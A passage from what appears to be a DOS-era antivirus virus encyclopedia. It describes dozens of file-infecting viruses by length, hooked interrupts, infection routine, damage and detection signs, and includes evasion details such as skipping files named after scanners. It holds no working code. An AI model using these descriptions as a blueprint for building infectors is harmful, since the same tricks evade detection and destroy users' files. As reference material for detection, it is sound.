  10568.  
  10569. Symptoms: Lost disk data and increased file sizes.
  10570.  
  10571. [Stunning Blow]
  10572. Virus Name: STUNNING BLOW
  10573. Virus Type: Virus infects .EXE files but not the following headed
  10574.             names: "TB","F-","CP","NA","SC","CL","V." Virus is a
  10575.             Memory Block Resident.
  10576. Virus Length: 1237 bytes on file and 1392 bytes in memory.
  10577.  
  10578. Interrupt Vectors Hooked: INT 21h.
  10579.  
  10580. Infection Process:
  10581. This virus will activate on the 4, 8, 12, 16, 20, 24, and 28  of
  10582. each month, after the initial delay period of one month.  Upon
  10583. activation the virus will:
  10584. (1) Hook interrupt 08h, counter = FFD0h
  10585. (2) Decrease the counter by 18.2 every second, and
  10586. (3) When the counter reaches zero it will start to play music on
  10587.     the speaker. This virus also activates when a random seed =
  10588.     -1, and it will display the following message:
  10589.  
  10590.     " Stunning Blow (R) Ghost Player Italy."
  10591.  
  10592. Damage: Virus deletes "*.CPS"  files.
  10593.  
  10594. Symptoms: Loss of some files named as "*.CPS" and increased file
  10595. sizes. Decreased available memory.
  10596.  
  10597. [Sunrise]
  10598. Virus Name: SUNRISE
  10599. Virus Type: Virus infects .EXE files.  File Infector Virus.
  10600. Virus Length: 1033 bytes on file and 80 bytes in memory after
  10601.               activation.
  10602.  
  10603. Interrupt Vectors Hooked: INT 21h
  10604.  
  10605. Infection Process:
  10606. From the root directory of the current disk, virus searches for
  10607. the last subdirectory then changes to that subdirectory and all
  10608. subsequent last subdirectories.  Virus then searches to infect an
  10609. "*.EXE" that has not been infected. Virus checks the disk serial
  10610. number. If the number is equal to zero and one memory word is
  10611. equal to 2Dh, it will display the following message:
  10612.  
  10613.     "* Sun Rise * EpidemicWare G.I.P.Po oct-93."
  10614.  
  10615. Interrupt 08h will be hooked: If the month when the executed file
  10616. was infected is not equal to the current month, the virus will
  10617. hook int 08h, which will:
  10618.   (i) Be resident at the top of memory but below the 640k
  10619.       boundary.
  10620.  (ii) Decrease available memory by 80 bytes.
  10621. (iii) Assign a value BDD8h to a counter and decrease the counter
  10622.       by 18.2 every second. When the counter reaches zero the
  10623.       screen will blank and the original screen contents will
  10624.       then scroll up.  After this you can continue as normal.
  10625.  (iv) Assign a value 1518h to the counter and repeat step (ii),
  10626.       (iii), (iv).
  10627.  
  10628. Damage: Virus hooks int 8h and at certain intervals the screen
  10629. goes blank and scrolls up.
  10630.  
  10631. Symptoms: Increased file sizes.  Decreased available memory.
  10632.  
  10633. [Thule]
  10634. Virus Name: THULE
  10635. Virus Type: Virus infects .COM files shorter than 61,054 bytes.
  10636.             Virus is a Memory Block Resident.
  10637. Virus Length: Virus infects COM files 309 bytes and 68 bytes in
  10638.               memory.
  10639.  
  10640. Interrupt Vectors Hooked: INT 21h.
  10641.  
  10642. Infection Process:
  10643. This virus will move virus code to 0:200h-0:243h and hook int 21h
  10644. in order to delete a file named "THULE.COM."  When DOS changes
  10645. the current directory , it will try to open "THULE.COM" on
  10646. current directory.  When found, this file will be deleted.
  10647.  
  10648. Damage: The file named "THULE.COM" will be deleted.
  10649.  
  10650. Symptoms: Increased file sizes.  A file is deleted.
  10651.  
  10652. [Topa 1.20]
  10653. Virus Name: TOPA 1.20
  10654. Virus Type: Virus infects .COM files between 2712 and 60000
  10655.             bytes. Infects .EXE files between 5424 and 524288
  10656.             bytes.  Virus is a Memory Block Resident.
  10657. Virus Length: EXE files: 2456 - 2471 bytes and
  10658.               COM files: 2456 bytes. 5536 bytes in memory.
  10659.  
  10660. Interrupt Vectors Hooked: INT 1Ch and INT 21h.
  10661.  
  10662. Infection Process:
  10663. This virus is spread by executing an infected program. When a
  10664. TOPA_1.2 infected program is executed, it will check to see if
  10665. AX= 4290h,INT 21 and return AX = 9047 indicate it is already
  10666. resident in memory. If is already in memory it will execute the
  10667. infected program. If it is not in memory, it will perform the
  10668. following functions:
  10669. 1) It will change memory allocate strategy to low memory last
  10670.    fit,then stay resident at the MCB (memory control block).The
  10671.    available free memory will have decreased by 5536 (15A0H)
  10672.    bytes.
  10673. 2) Once the TOPA_1.2 virus is memory resident, it will hook int
  10674.    1Ch and int 21h in order to infect files.
  10675.  
  10676. Damage: Decreased available memory.
  10677.  
  10678. Symptoms: Increased file sizes.
  10679.  
  10680. [Topo]
  10681. Virus Name: TOPO
  10682. Virus Type: Virus infects .EXE files shorter than 524288 bytes.
  10683.             Virus is a Memory Block Resident.
  10684. Virus Length: EXE files: 1536 - 1552 bytes and 3616 bytes in
  10685.               memory.
  10686.  
  10687. Interrupt Vectors Hooked: INT 21h.
  10688.  
  10689. Infection Process:
  10690. This virus is spread by executing an infected program. When a
  10691. TOPO infected program is executed, first it will hook INT 3 then
  10692. use this interrupt to deceive the virus body.  The virus will
  10693. then check to see if it is already resident in memory by checking
  10694. to see if address 0:3feh contains the value 0011h.  If the virus
  10695. is already in memory it will execute the infected program. Virus
  10696. will not include files names such as: "*AN.EXE" , "*LD.EXE" with
  10697. '*' being a wild card.
  10698.  
  10699. Damage: Virus destroys diskette parameter (00:525h - 0:52Ch) and
  10700. displays the following  message:
  10701.  
  10702.     "R(etry), I(gnore), F(ail), or A(bort) ?"
  10703.  
  10704. Symptoms: Increased file sizes and the inability to read certain
  10705. files. Decreased available memory.
  10706.  
  10707. Note: If the system date is equal to the 25 or 26 of any month,
  10708. the above message will manifest.
  10709.  
  10710. [Bloody Warrior]
  10711. Virus Name:  BLOODY-WARRIOR
  10712. Virus Type:  Resident at the top of the MCB (memory control
  10713. block).
  10714. Virus Length: 1344 bytes in the file and 2768 bytes in memory.
  10715.  
  10716. PC Vectors Hooked:
  10717.  
  10718. Executing Procedure:
  10719. Virus infects COM and .EXE files as long as the .COM file is
  10720. shorter than EA60h bytes.  It will not infect the following
  10721. files: "SCAN", "STOP", "SHIELD", "CLEAN", "CV", "DEBUG", "TD."
  10722. This virus can spread only by executing an infected program.
  10723.  
  10724. Damage:
  10725. Virus destroys disk sector from sector 1 to 256. By progressive
  10726. action: it will write garbage to the current disk from sectors 1
  10727. to 256 when it is the fourth  or later in the month of July.
  10728.  
  10729. Detecting Method:
  10730. Can find that the file length of infected file increases 1344
  10731. bytes.
  10732.  
  10733. Symptoms:
  10734. When a BLOODY-WARRIOR infected program is executed it will be:
  10735. 1. Resident at the top of system memory but below the 640k DOS
  10736.    boundary. The available free memory will be decreased by 2768
  10737.    bytes.
  10738. 2. Interrupt 21h will be hooked: When the BLOODY-WARRIOR virus is
  10739.    memory resident, in order to infect the files the virus will
  10740.    control the following functions:
  10741.         - loading and executing (AX=4B00h)
  10742.         - opening (AH=3Dh)
  10743.         - get and set file attribute (AH=43h)
  10744.         - rename a file (AH = 56h)
  10745.    It will infect .EXE .COM files when they are executed, opened,
  10746.    when getting file attributes, or when renaming files.  But it
  10747.    will not infect .COM files if the length is greater than EA60h
  10748.    bytes. Infected programs will have a file length increase of
  10749.    1344 bytes with the virus being located at the end of the
  10750.    file. If file header is : "SCAN","STOP", "SHIELD", "CLEAN",
  10751.    "CV", "DEBUG", or "TD" the virus will not infect these files
  10752.    but will instead restore int 21h to the original interrupt
  10753.    vector so these files will not be able to detect the virus.
  10754. 3. This virus will only activate in July, when the date is the
  10755.    4th or later. It will write garbage to the current disk from
  10756.    sectors 1 to 256. The garbage data includes the follow message
  10757.  
  10758.  
  10759.                Hello, world!
  10760.                I am the Bloody Warrior.
  10761.                Nice to meet you.
  10762.                What about this virus ? Funny ?
  10763.                There is no hope for you.
  10764.                This virus was released in Milan
  10765.                1993.
  10766.  
  10767. Note: There is a possibility of detection when using DOS commands
  10768.  
  10769. [17690]
  10770. Virus Name: 17690
  10771. Virus Type: EXE File infector
  10772. Virus Length:  17,690 bytes
  10773.  
  10774. Executing Procedure:
  10775. 1) There is a 10% chance that the virus will infect a file. The
  10776.    method of infection is: virus searches for an EXE file on
  10777.    diskette A. Then renames this file and creates a new COM file
  10778.    wi9th the same name as the original EXE file. This new COM
  10779.    file is the virus.
  10780. 2) When virus does not infect files, it will execute the program
  10781.    that has been renamed. User will not see any unusual
  10782.    manifestation.
  10783.  
  10784. Damage: None
  10785.  
  10786. Detecting Method: Infected file sizes increase by 17,690 bytes.
  10787.  
  10788. [Fish 1100]
  10789. Virus Name: Fish-1100
  10790. Virus Type: COM File infector
  10791. Virus Length:  1100 bytes
  10792.  
  10793. Executing Procedure:
  10794. Virus checks whether it has stayed resident in memory. If not, it
  10795. will stay resident in high memory. Then hooks INT 21h and goes
  10796. back to original routine.
  10797.  
  10798. Vectors hooked:
  10799. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  10800. 24h to prevent divulging its trace when writing. If the program
  10801. to be executed is an uninfected COM file, virus proceeds to
  10802. infect it.
  10803.  
  10804. Damage: None
  10805.  
  10806. Detecting Method: Infected file sizes increase by 1100 bytes.
  10807.  
  10808. [Fish 2420]
  10809. Virus Name: Fish-2420
  10810. Virus Type: COM File infector
  10811. Virus Length:  2420 bytes
  10812.  
  10813. Executing Procedure:
  10814. Virus checks whether it has stayed resident in memory. If not, it
  10815. will stay resident in high memory. Then hooks INT 21h and goes
  10816. back to original routine.
  10817.  
  10818. Vectors hooked:
  10819. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  10820. 24h to prevent divulging its trace when writing. If the program
  10821. to be executed is an uninfected COM file, virus proceeds to
  10822. infect it.
  10823.  
  10824. Damage: None
  10825.  
  10826. Detecting Method: Infected file sizes increase by 2420 bytes.
  10827.  
  10828. [Small 178]
  10829. Virus Name: Small-178
  10830. Virus Type: COM File infector
  10831. Virus Length:  178 bytes
  10832.  
  10833. Executing Procedure:
  10834. Virus checks whether it has stayed resident in memory. If not, it
  10835. will stay resident in high memory. Then hooks INT 21h and goes
  10836. back to original routine.
  10837.  
  10838. Vectors hooked:
  10839. Hooks INT 21H(AH=4Bh)to infect files. If the program to be
  10840. executed is an uninfected COM file, virus proceeds to infect it.
  10841.  
  10842. Damage: None
  10843.  
  10844. Note: You will see an error message when writing because INT 24h
  10845. has not been hanged.
  10846.  
  10847. Detecting Method: Infected file sizes increase by 178 bytes.
  10848.  
  10849. [Shiny-Happy]
  10850. Virus Name: Shiny-Happy
  10851. Virus Type: EXE File infector
  10852. Virus Length:  921 bytes
  10853.  
  10854. Executing Procedure:
  10855. Virus checks whether it has stayed resident in memory. If not, it
  10856. will stay resident in high memory. Then hooks INT 21h and goes
  10857. back to original routine.
  10858.  
  10859. Vectors hooked:
  10860. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  10861. executed is an uninfected EXE file, virus proceeds to infect it.
  10862.  
  10863. Damage: None
  10864.  
  10865. Detecting Method: Infected file sizes increase by 921 bytes.
  10866.  
  10867. [Sucker]
  10868. Virus Name: Sucker
  10869. Virus Type: EXE File infector
  10870. Virus Length:  572 bytes
  10871.  
  10872. Executing Procedure:
  10873. Virus checks whether it has stayed resident in memory. If not, it
  10874. will stay resident in high memory. Then hooks INT 21h and goes
  10875. back to original routine.
  10876.  
  10877. Vectors hooked:
  10878. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  10879. executed is an uninfected COM file, virus proceeds to infect it.
  10880.  
  10881. Damage: None
  10882.  
  10883. Note:
  10884. 1) You will see an error message when writing because INT 24h has
  10885.    not been hanged.
  10886. 2) This virus can be cleared with Soft-Mice. Virus will make a
  10887.    mistake in clearing SUCKER.CO..
  10888.  
  10889. Detecting Method: Infected file sizes increase by 572 bytes.
  10890.  
  10891. [Data-Rape-2.0]
  10892. Virus Name: Data-Rape-2.0
  10893. Virus Type: COM & EXE File infector
  10894. Virus Length:  1875-1890 bytes
  10895.  
  10896. Executing Procedure:
  10897. Virus checks whether it has stayed resident in memory. If not, it
  10898. will stay resident in high memory. Then hooks INT 21h and goes
  10899. back to original routine.
  10900.  
  10901. Vectors hooked:
  10902. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  10903. executed is an uninfected COM or EXE file, virus proceeds to
  10904. infect it.
  10905.  
  10906. Damage: None
  10907.  
  10908. Detecting Method: Infected file sizes increase by 1875-1890
  10909. bytes.
  10910.  
  10911. [Flagyll]
  10912. Virus Name: Flagyll
  10913. Virus Type: EXE File infector
  10914. Virus Length:
  10915.  
  10916. Executing Procedure:
  10917. Virus checks whether it has stayed resident in memory. If not, it
  10918. will stay resident in high memory. Then hooks INT 21h and goes
  10919. back to original routine.
  10920.  
  10921. Vectors hooked:
  10922. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  10923. executed is an uninfected EXE file, virus proceeds to infect it.
  10924.  
  10925. Damage: It will overwrite original files with a virus code.
  10926. Original files are destroyed.
  10927.  
  10928. Note: You will see an error message when writing because INT 24h
  10929. has not been hanged.
  10930.  
  10931. [X-3B]
  10932. Virus Name: X-3B
  10933. Virus Type: COM & EXE File infector
  10934. Virus Length:  1060 bytes
  10935.  
  10936. Executing Procedure:
  10937. Virus checks whether it has stayed resident in memory. If not, it
  10938. will stay resident in high memory. Then hooks INT 21h and goes
  10939. back to original routine.
  10940.  
  10941. Vectors hooked:
  10942. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  10943. executed is an uninfected COM or EXE file, virus proceeds to
  10944. infect it.
  10945.  
  10946. Damage: None
  10947.  
  10948. Detecting Method: Infected file sizes increase by 1060 bytes.
  10949.  
  10950. [Math-Test]
  10951. Virus Name: Math-Test
  10952. Virus Type: COM & EXE File infector
  10953. Virus Length:  1136 bytes
  10954.  
  10955. Executing Procedure:
  10956. Virus checks whether it has stayed resident in memory. If not, it
  10957. will stay resident in high memory. Then hooks INT 21h and goes
  10958. back to original routine.
  10959.  
  10960. Vectors hooked:
  10961. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  10962. executed is an uninfected COM or EXE file, virus proceeds to
  10963. infect it.
  10964.  
  10965. Damage: None
  10966.  
  10967. Note: You will see an error message when writing because INT 24h
  10968. has not been hanged.
  10969.  
  10970. Detecting Method: Infected file sizes increase by 1136 bytes.
  10971.  
  10972. [Not-586]
  10973. Virus Name: Not-586
  10974. Virus Type: COM File infector
  10975. Virus Length:  586 bytes
  10976.  
  10977. Executing Procedure:
  10978. Virus checks whether it has stayed resident in memory. If not, it
  10979. will stay resident in high memory. Then hooks INT 21h and goes
  10980. back to original routine.
  10981.  
  10982. Vectors hooked:
  10983. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  10984. 24h to prevent divulging its trace when writing. If the program
  10985. to be executed is an uninfected COM file, virus proceeds to
  10986. infect it.
  10987.  
  10988. Damage: None
  10989.  
  10990. Detecting Method: Infected file sizes increase by 586 bytes.
  10991.  
  10992. [Xoana]
  10993. Virus Name: Xoana
  10994. Virus Type: EXE File infector
  10995. Virus Length:  1670 bytes
  10996.  
  10997. Executing Procedure:
  10998. Virus checks whether it has stayed resident in memory. If not, it
  10999. will stay resident in high memory. Then hooks INT 21h and goes
  11000. back to original routine.
  11001.  
  11002. Vectors hooked:
  11003. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  11004. executed is an uninfected EXE file, virus proceeds to infect it.
  11005.  
  11006. Damage: None
  11007.  
  11008. Note: You will see an error message when writing because INT 24h
  11009. has not been hanged.
  11010.  
  11011. Detecting Method: Infected file sizes increase by 1670 bytes.
  11012.  
  11013. [Pit-1228]
  11014. Virus Name: Pit-1228
  11015. Virus Type: COM & EXE File infector
  11016. Virus Length:  1228 bytes
  11017.  
  11018. Executing Procedure:
  11019. Virus checks whether it has stayed resident in memory. If not, it
  11020. will stay resident in high memory. Then hooks INT 21h and goes
  11021. back to original routine.
  11022.  
  11023. Vectors hooked:
  11024. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  11025. 24h to prevent divulging its trace when writing. If the program
  11026. to be executed is an uninfected COM or EXE file, virus proceeds
  11027. to infect it.
  11028.  
  11029. Damage: None
  11030.  
  11031. Detecting Method: Infected file sizes increase by 1228 bytes.
  11032.  
  11033. [Finnish-357]
  11034. Virus Name: Finnish-357
  11035. Virus Type: COM File infector
  11036. Virus Length:  709 BYTES
  11037.  
  11038. Executing Procedure:
  11039. Virus checks whether it has stayed resident in memory. If not, it
  11040. will stay resident in high memory. Then hooks INT 21h and checks
  11041. whether COMMAND.COM that booted up system has been infected. If
  11042. not, virus infects it and goes back to original routine.
  11043.  
  11044. Vectors hooked:
  11045. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  11046. executed is an uninfected COM file, virus proceeds to infect it.
  11047.  
  11048. Detecting Method: Infected file sizes increase by 709 bytes.
  11049.  
  11050. [TU-482]
  11051. Virus Name: Tu-482
  11052. Virus Type: COM File infector
  11053. Virus Length:  482 bytes
  11054.  
  11055. Executing Procedure:
  11056. Virus checks whether it has stayed resident in memory. If not, it
  11057. will stay resident in high memory. Then hooks INT 21h and goes
  11058. back to original routine.
  11059.  
  11060. Vectors hooked:
  11061. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  11062. executed is an uninfected COM file, virus proceeds to infect it.
  11063.  
  11064. Damage: None
  11065.  
  11066. Note:
  11067. 1) You will see an error message when writing because INT 24h has
  11068.    not been hanged.
  11069. 2) When virus is executed, it will jump to the end of the
  11070.    program. It will then jump back to the beginning making it
  11071.    difficult to locate.
  11072.  
  11073. Detecting Method: Infected file sizes increase by 482 bytes.
  11074.  
  11075. [Uruk-Hai]
  11076. Virus Name: Uruk-Hai
  11077. Virus Type: COM File infector
  11078. Virus Length:  394 bytes
  11079.  
  11080. Executing Procedure:
  11081. Virus checks whether it has stayed resident in memory. If not, it
  11082. will stay resident in high memory. Then hooks INT 21h and goes
  11083. back to original routine.
  11084.  
  11085. Vectors hooked:
  11086. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  11087. 24h to prevent divulging its trace when writing. If the program
  11088. to be executed is an uninfected COM file, virus proceeds to
  11089. infect it.
  11090.  
  11091. Damage: None
  11092.  
  11093. Detecting Method: Infected file sizes increase by 394 bytes.
  11094.  
  11095. [V-388]
  11096. Virus Name: V-388
  11097. Virus Type: COM File infector
  11098. Virus Length:  394 bytes
  11099.  
  11100. Executing Procedure:
  11101. Virus checks whether it has stayed resident in memory. If not, it
  11102. will stay resident in high memory. Then hooks INT 21h and goes
  11103. back to original routine.
  11104.  
  11105. Vectors hooked:
  11106. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  11107. 24h to prevent divulging its trace when writing. If the program
  11108. to be executed is an uninfected COM file, and this program ends
  11109. with INT 21(AH=4Ch), virus proceeds to infect it.
  11110.  
  11111. Damage: None
  11112.  
  11113. Detecting Method: Infected file sizes increase by 394 bytes.
  11114.  
  11115. [Wizard 3.0]
  11116. Virus Name: Wizard-3.0
  11117. Virus Type: COM File infector
  11118. Virus Length:  268 bytes
  11119.  
  11120. Executing Procedure:
  11121. Virus checks whether it has stayed resident in memory. If not, it
  11122. will stay resident in high memory. Then hooks INT 21h and goes
  11123. back to original routine.
  11124.  
  11125. Vectors hooked:
  11126. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  11127. executed is an uninfected COM file, virus proceeds to infect it.
  11128.  
  11129. Damage: None
  11130.  
  11131. Note: You will see an error message when writing because INT 24h
  11132. has not been hanged.
  11133.  
  11134. Detecting Method: Infected file sizes increase by 268 bytes.
  11135.  
  11136. [Semtex]
  11137. Virus Name: Semtex
  11138. Virus Type: COM File infector
  11139. Virus Length:  1000 bytes
  11140.  
  11141. Executing Procedure:
  11142. Virus checks whether it has stayed resident in memory. If not, it
  11143. will stay resident in high memory. Then hooks INT 21h, INT 8h and
  11144. goes back to original routine.
  11145.  
  11146. Vectors hooked:
  11147. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  11148. executed is an uninfected COM file, virus proceeds to infect it.
  11149.  
  11150. Damage: None
  11151.  
  11152. Note:
  11153. 1) You will see an error message when writing because INT 24h has
  11154.    not been hanged.
  11155. 2) The sentence at the beginning of infected file is:
  11156.  
  11157.                    MOV     BP,XXXX
  11158.                    JMP     BP
  11159.  
  11160. Detecting Method: Infected file sizes increase by 1000 bytes.
  11161.  
  11162. [1720]
  11163. Virus Name: 1720
  11164. Virus Type: COM File infector
  11165. Virus Length:  1723 bytes
  11166.  
  11167. Executing Procedure:
  11168. Virus checks whether it has stayed resident in memory. If not, it
  11169. will stay resident in high memory. Then hooks INT 21h and goes
  11170. back to original routine.
  11171.  
  11172. Vectors hooked:
  11173. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  11174. 24h to prevent divulging its trace when writing. If the program
  11175. to be executed is an uninfected COM file, virus proceeds to
  11176. infect it.
  11177.  
  11178. Damage: None
  11179.  
  11180. Detecting Method: Infected file sizes increase by 1723 bytes.
  11181.  
  11182. [Number 6]
  11183. Virus Name: Number6
  11184. Virus Type: COM File infector
  11185. Virus Length:  631 bytes
  11186.  
  11187. Executing Procedure:
  11188. Virus checks whether it has stayed resident in memory. If not, it
  11189. will stay resident in high memory. Then hooks INT 21h and goes
  11190. back to original routine.
  11191.  
  11192. Vectors hooked:
  11193. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  11194. 24h to prevent divulging its trace when writing. If the program
  11195. to be executed is an uninfected COM file, virus proceeds to infect
  11196. it.
  11197.  
  11198. Damage: None
  11199.  
  11200. Detecting Method: Infected file sizes increase by 631 bytes.
  11201.  
  11202. [Timemark]
  11203. Virus Name: Timemark
  11204. Virus Type: EXE File infector
  11205. Virus Length:  1060-1080 bytes
  11206.  
  11207. Executing Procedure:
  11208. Virus checks whether it has stayed resident in memory. If not, it
  11209. will stay resident in high memory. Then hooks INT 21h and goes
  11210. back to original routine.
  11211.  
  11212. Vectors hooked:
  11213. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  11214. executed is an uninfected EXE file, virus proceeds to infect it.
  11215.  
  11216. Damage: None
  11217.  
  11218. Detecting Method: Infected file sizes increase by 1060-1080
  11219. bytes.
  11220.  
  11221. [Sergant]
  11222. Virus Name: Sergant
  11223. Virus Type: COM File infector
  11224. Virus Length:  108 bytes
  11225.  
  11226. Executing Procedure:
  11227. Virus checks whether it has stayed resident in memory. If not, it
  11228. will stay resident in high memory then hooks INT 21h and goes
  11229. back to original routine.
  11230.  
  11231. Vectors hooked:
  11232. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  11233. executed is an uninfected COM file, virus proceeds to infect it.
  11234.  
  11235. Damage: None
  11236.  
  11237. Note: You will see an error message when writing because INT 24h
  11238. has not been hanged.
  11239.  
  11240. Detecting Method: Infected file sizes increase by 108 bytes.
  11241.  
  11242. [Penza]
  11243. Virus Name: Penza
  11244. Virus Type: COM File infector
  11245. Virus Length:  700 bytes
  11246.  
  11247. Executing Procedure:
  11248. Virus checks whether it has stayed resident in memory. If not, it
  11249. will stay resident in high memory. Then hooks INT 21h and goes
  11250. back to original routine.
  11251.  
  11252. Vectors hooked:
  11253. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  11254. 24h to prevent divulging its trace when writing. If the program
  11255. to be executed is an uninfected COM file, virus proceeds to
  11256. infect it.
  11257.  
  11258. Damage: None
  11259.  
  11260. Detecting Method: Infected file sizes increase by 700 bytes.
  11261.  
  11262. [Nines]
  11263. Virus Name: Nines
  11264. Virus Type: COM File infector
  11265. Virus Length:  706 or 776 bytes
  11266.  
  11267. Executing Procedure:
  11268. Virus checks whether it has stayed resident in memory. If not, it
  11269. will stay resident in high memory. Then hooks INT 21h and goes
  11270. back to original routine.
  11271.  
  11272. Vectors hooked:
  11273. Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  11274. executed is an uninfected COM file, virus proceeds to infect it.
  11275.  
  11276. Damage: None
  11277.  
  11278. Note: You will see an error message when writing because INT 24h
  11279. has not been hanged.
  11280.  
  11281. Detecting Method: Infected file sizes increase by 706 OR 776
  11282. bytes.
  11283.  
  11284. [Seacat]
  11285. Virus Name: Seacat
  11286. Virus Type: COM File infector
  11287. Virus Length:  1600 bytes
  11288.  
  11289. Executing Procedure:
  11290. Virus searches for an uninfected COM file on current directory,
  11291. then infects it (Infects only one file at a time).
  11292.  
  11293. Damage: None
  11294.  
  11295. Note:
  11296. 1) It does not stay resident in memory.
  11297. 2) You will see an error message when writing because INT 24h has
  11298.    not been hanged.
  11299.  
  11300. Detecting Method: Infected file sizes increase by 1600 bytes.
  11301.  
  11302. [Wake]
  11303. Virus Name: Wake
  11304. Virus Type: EXE File infector
  11305. Virus Length:
  11306.  
  11307. Executing Procedure:
  11308. Virus searches for all uninfected EXE files on current directory,
  11309. then infects them (Infects only one file at a time).
  11310.  
  11311. Damage: It will overwrite original files with a virus code.
  11312. Original files are destroyed.
  11313.  
  11314. Note:
  11315. 1) It does not stay resident in memory.
  11316. 2) You will see an error message when writing because INT 24h has
  11317.    not been hanged.
  11318.  
  11319. [T-1000-B]
  11320. Virus Name: T-1000-B
  11321. Virus Type: COM File infector
  11322. Virus Length:
  11323.  
  11324. Executing Procedure:
  11325. Virus searches for all uninfected COM files on current directory,
  11326. then infects them (Infects only one file at a time).
  11327.  
  11328. Damage: It will overwrite original files with a virus code.
  11329. Original files are destroyed.
  11330.  
  11331. Note:
  11332. 1) It does not stay resident in memory.
  11333. 2) You will see an error message when writing because INT 24h has
  11334.    not been hanged.
  11335.  
  11336. [Soupy]
  11337. Virus Name: Soupy
  11338. Virus Type: COM File infector
  11339. Virus Length:  1072 bytes
  11340.  
  11341. Executing Procedure:
  11342. Virus searches for an uninfected COM file on current directory,
  11343. then infects it (Infects only one file at a time).
  11344.  
  11345. Damage: None
  11346.  
  11347. Note:
  11348. 1) It does not stay resident in memory.
  11349. 2) You will see an error message when writing because INT 24h has
  11350.    not been hanged.
  11351.  
  11352. Detecting Method: Infected file sizes increase by 1072 bytes.
  11353.  
  11354. [Small-Exe]
  11355. Virus Name: Small-Exe
  11356. Virus Type: EXE File infector
  11357. Virus Length:  349 bytes
  11358.  
  11359. Executing Procedure:
  11360. Virus searches for an uninfected EXE file on current directory,
  11361. then infects it (Infects only one file at a time).  After
  11362. infection, virus halts system.
  11363.  
  11364. Damage: Virus will halt system every time it infects a file.
  11365.  
  11366. Note:
  11367. 1) It does not stay resident in memory.
  11368. 2) You will see an error message when writing because INT 24h has
  11369.    not been hanged.
  11370.  
  11371. Detecting Method: Infected file sizes increase by 349 bytes.
  11372.  
  11373. [Toys]
  11374. Virus Name: Toys
  11375. Virus Type: COM & EXE File infector
  11376. Virus Length:  773 bytes
  11377.  
  11378. Executing Procedure:
  11379. Virus searches for uninfected COM files on current directory,
  11380. then infects them (Infects two files at a time).
  11381.  
  11382. Damage: None
  11383.  
  11384. Note:
  11385. 1) It does not stay resident in memory.
  11386. 2) You will see an error message when writing because INT 24h has
  11387.    not been hanged.
  11388.  
  11389. Detecting Method: Infected file sizes increase by 773 bytes.
  11390.  
  11391. [Leper]
  11392. Virus Name: Leper
  11393. Virus Type: COM & EXE File infector
  11394. Virus Length:
  11395.  
  11396. Executing Procedure:
  11397. Virus searches for uninfected COM files on current directory,
  11398. then infects them (Infects four files at a time).
  11399.  
  11400. Damage: It will overwrite original files with a virus code.
  11401. Original files are destroyed.
  11402.  
  11403. Note:
  11404. 1) It does not stay resident in memory.
  11405. 2) You will see an error message when writing because INT 24h has
  11406.    not been hanged.
  11407.  
  11408. [Arcv-7]
  11409. Virus Name: Arcv-7
  11410. Virus Type: EXE File infector
  11411. Virus Length:  541 bytes
  11412.  
  11413. Executing Procedure:
  11414. Virus searches for an uninfected EXE file on current directory,
  11415. then infects it (Infects only one file at a time).
  11416.  
  11417. Damage: None
  11418.  
  11419. Note:
  11420. 1) Because the virus infection program is not well written, the
  11421.    system will halt when an infected program is executed.
  11422. 2) It does not stay resident in memory.
  11423. 3) You will see an error message when writing because INT 24h has
  11424.    not been hanged.
  11425.  
  11426. Detecting Method: Infected file sizes increase by 541 bytes.
  11427.  
  11428. [Arcv-6]
  11429. Virus Name: Arcv-6
  11430. Virus Type: COM File infector
  11431. Virus Length:  335 bytes
  11432.  
  11433. Executing Procedure:
  11434. Virus searches for an uninfected COM file on current directory,
  11435. then infects it (Infects only one file at a time).
  11436.  
  11437. Damage: None
  11438.  
  11439. Note:
  11440. 1) It does not stay resident in memory.
  11441.  
  11442. 2) You will see an error message when writing because INT 24h has
  11443.    not been hanged.
  11444.  
  11445. Detecting Method: Infected file sizes increase by 335 bytes.
  11446.  
  11447. [Arcv-5]
  11448. Virus Name: Arcv-5
  11449. Virus Type: COM File infector
  11450. Virus Length:  475 bytes
  11451.  
  11452. Executing Procedure:
  11453. Virus searches for an uninfected COM file on current directory,
  11454. then infects it (Infects only one file at a time).
  11455.  
  11456. Damage: None
  11457.  
  11458. Note:
  11459. 1) It does not stay resident in memory.
  11460. 2) You will see an error message when writing because INT 24h has
  11461.    not been hanged.
  11462.  
  11463. Detecting Method: Infected file sizes increase by 475 bytes.
  11464.  
  11465. [Exper-416]
  11466. Virus Name: Exper-416
  11467. Virus Type: COM File infector
  11468. Virus Length:  416 bytes
  11469.  
  11470. Executing Procedure:
  11471. Virus searches for all uninfected COM files on current directory,
  11472. then infects them.
  11473.  
  11474. Damage: None
  11475.  
  11476. Note:
  11477. 1) It does not stay resident in memory.
  11478. 2) You will see an error message when writing because INT 24h has
  11479.    not been hanged.
  11480.  
  11481. Detecting Method: Infected file sizes increase by 416 bytes.
  11482.  
  11483. [Ash-B]
  11484. Virus Name: Ash-B
  11485. Virus Type: COM File infector
  11486. Virus Length:  280 bytes
  11487.  
  11488. Executing Procedure:
  11489. Virus searches for all uninfected COM files on current directory,
  11490. then infects them.
  11491.  
  11492. Damage: None
  11493.  
  11494. Note:
  11495. 1) It does not stay resident in memory.
  11496. 2) You will see an error message when writing because INT 24h has
  11497.    not been hanged.
  11498.  
  11499. Detecting Method: Infected file sizes increase by 280 bytes.
  11500.  
  11501. [Scribble]
